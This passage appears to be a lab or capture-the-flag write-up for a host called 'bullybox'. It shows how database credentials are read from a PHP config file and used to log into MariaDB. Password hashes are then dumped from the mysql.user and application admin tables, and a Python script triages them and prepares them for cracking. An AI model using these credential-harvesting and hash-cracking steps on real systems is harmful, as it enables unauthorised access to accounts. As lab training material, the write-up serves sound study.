MySQL


Checking for DB credentials in the application config after the manual system enumeration

yuki@bullybox:/var/www/bullybox$ cat bb-config.php | grep -v '^[#/]'
<?php
return array (
  'debug' => false,
  'salt' => 'b94ff361990c5a8a37486ffe13fabc96',
  'url' => 'http://bullybox.local/',
  'admin_area_prefix' => '/bb-admin',
  'sef_urls' => true,
  'timezone' => 'UTC',
  'locale' => 'en_US',
  'locale_date_format' => '%A, %d %B %G',
  'locale_time_format' => ' %T',
  'path_data' => '/var/www/bullybox/bb-data',
  'path_logs' => '/var/www/bullybox/bb-data/log/application.log',
  'log_to_db' => true,
  'db' =>
  array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Playing-Unstylish7-Provided',
  ),
  'twig' =>
  array (
    'debug' => true,
    'auto_reload' => true,
    'cache' => '/var/www/bullybox/bb-data/cache',
  ),
  'api' =>
  array (
    'require_referrer_header' => false,
    'allowed_ips' =>
    array (
    ),
    'rate_span' => 3600,
    'rate_limit' => 1000,
  ),
);

The config stores the DB credential in clear text and it is the same pair: admin:Playing-Unstylish7-Provided. Note that passing the password with -p on the command line leaks it into the shell history and the process list; `mysql -uadmin -p` (prompting for the password) is the quieter option.

yuki@bullybox:/var/www/bullybox$ mysql -uadmin -pPlaying-Unstylish7-Provided
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 130989
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 

Session established

mysql DB


MariaDB [(none)]> SELECT User,Password FROM mysql.user;
+-------------+-------------------------------------------+
| User        | Password                                  |
+-------------+-------------------------------------------+
| mariadb.sys |                                           |
| root        | invalid                                   |
| mysql       | invalid                                   |
| admin       | *409A97555E8BE08B7E88F3C5E7CABFC08EB1BFD1 |
+-------------+-------------------------------------------+
4 rows in set (0.001 sec)

Credential hashes in the mysql DB. The root and mysql accounts show "invalid", meaning password authentication is disabled for them; on a default MariaDB install they authenticate via the unix_socket plugin instead (check the plugin column: SELECT User,Host,plugin FROM mysql.user;). The admin row is a mysql_native_password hash, i.e. "*" followed by SHA1(SHA1(password)) in upper-case hex (hashcat mode 300, john format mysql-sha1).

boxbilling DB


MariaDB [(none)]> SELECT email,pass FROM boxbilling.admin;
+----------------------+--------------------------------------------------------------+
| email                | pass                                                         |
+----------------------+--------------------------------------------------------------+
| admin@bullybox.local | $2y$10$Yu8nDAxFAYfeVVZTdLfOjO0UhanwrYYYK1lDTHlF6TxxMU96r/pm2 |
+----------------------+--------------------------------------------------------------+
1 row in set (0.000 sec)

Credential hashes in the boxbilling DB. The application admin password is a bcrypt hash ($2y$ prefix, cost factor 10), which is slow to crack (hashcat mode 3200, john format bcrypt); testing it against the passwords already recovered from the box is the cheap first move.
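The triage that follows from the two table dumps, as an added Python example that is not part of the original write-up: it classifies each stored value (empty, "invalid", mysql_native_password, bcrypt), maps it to the cracking mode, and re-implements MySQL's native PASSWORD() function so a candidate such as the config password can be checked offline against the admin hash without touching the server again. The row data is constructed from the tables above; the function names are my own.

```python
"""Triage of credential hashes pulled from mysql.user and an application table.

Added example: classifies stored password values, maps them to hashcat/john
modes, and checks candidate passwords offline against mysql_native_password
hashes. The sample rows are copied from the table dumps in the write-up.
"""
import hashlib
import re

# Constructed sample data, taken from the SELECT output above.
MYSQL_USER_ROWS = [
    ("mariadb.sys", ""),
    ("root", "invalid"),
    ("mysql", "invalid"),
    ("admin", "*409A97555E8BE08B7E88F3C5E7CABFC08EB1BFD1"),
]
BOXBILLING_ADMIN_ROWS = [
    ("admin@bullybox.local",
     "$2y$10$Yu8nDAxFAYfeVVZTdLfOjO0UhanwrYYYK1lDTHlF6TxxMU96r/pm2"),
]

NATIVE_RE = re.compile(r"\*[0-9A-F]{40}")
BCRYPT_RE = re.compile(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}")


def mysql_native_password(password: str) -> str:
    """MySQL/MariaDB PASSWORD(): '*' + upper(hex(SHA1(SHA1(password))))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify(stored: str) -> dict:
    """Identify the scheme of a stored password value and how to attack it."""
    if stored == "":
        return {"scheme": "empty", "crackable": False,
                "note": "no password set; auth is via plugin or account is locked"}
    if stored == "invalid":
        return {"scheme": "invalid", "crackable": False,
                "note": "password auth disabled; MariaDB unix_socket account"}
    if NATIVE_RE.fullmatch(stored):
        return {"scheme": "mysql_native_password", "crackable": True,
                "hashcat_mode": 300, "john_format": "mysql-sha1"}
    if BCRYPT_RE.fullmatch(stored):
        cost = int(stored.split("$")[2])
        return {"scheme": "bcrypt", "crackable": True, "cost": cost,
                "hashcat_mode": 3200, "john_format": "bcrypt"}
    return {"scheme": "unknown", "crackable": False}


def check_candidate(stored: str, candidate: str):
    """Offline password check. True/False for native hashes; None when the
    scheme cannot be verified with the standard library (bcrypt needs the
    bcrypt package or a cracker)."""
    info = classify(stored)
    if info["scheme"] == "mysql_native_password":
        return mysql_native_password(candidate) == stored
    return None


def triage(rows) -> list:
    """Return one record per account: which hashes are worth cracking and how."""
    out = []
    for user, stored in rows:
        info = classify(stored)
        out.append({"user": user, "stored": stored, **info})
    return out


def hashcat_lines(rows) -> list:
    """user:hash lines for the crackable entries (hashcat --username)."""
    return [f"{r['user']}:{r['stored']}" for r in triage(rows) if r["crackable"]]


if __name__ == "__main__":
    for rec in triage(MYSQL_USER_ROWS) + triage(BOXBILLING_ADMIN_ROWS):
        print(rec)
    print(hashcat_lines(MYSQL_USER_ROWS) + hashcat_lines(BOXBILLING_ADMIN_ROWS))
    # Does the clear-text config password match the admin DB hash?
    print("config password matches admin hash:",
          check_candidate(MYSQL_USER_ROWS[3][1], "Playing-Unstylish7-Provided"))
```

The native-hash check is instant and needs no wordlist, so it answers the reuse question for every `*`-prefixed row before any cracking starts; bcrypt rows are only classified here and go to hashcat or john with the recovered passwords as the first wordlist.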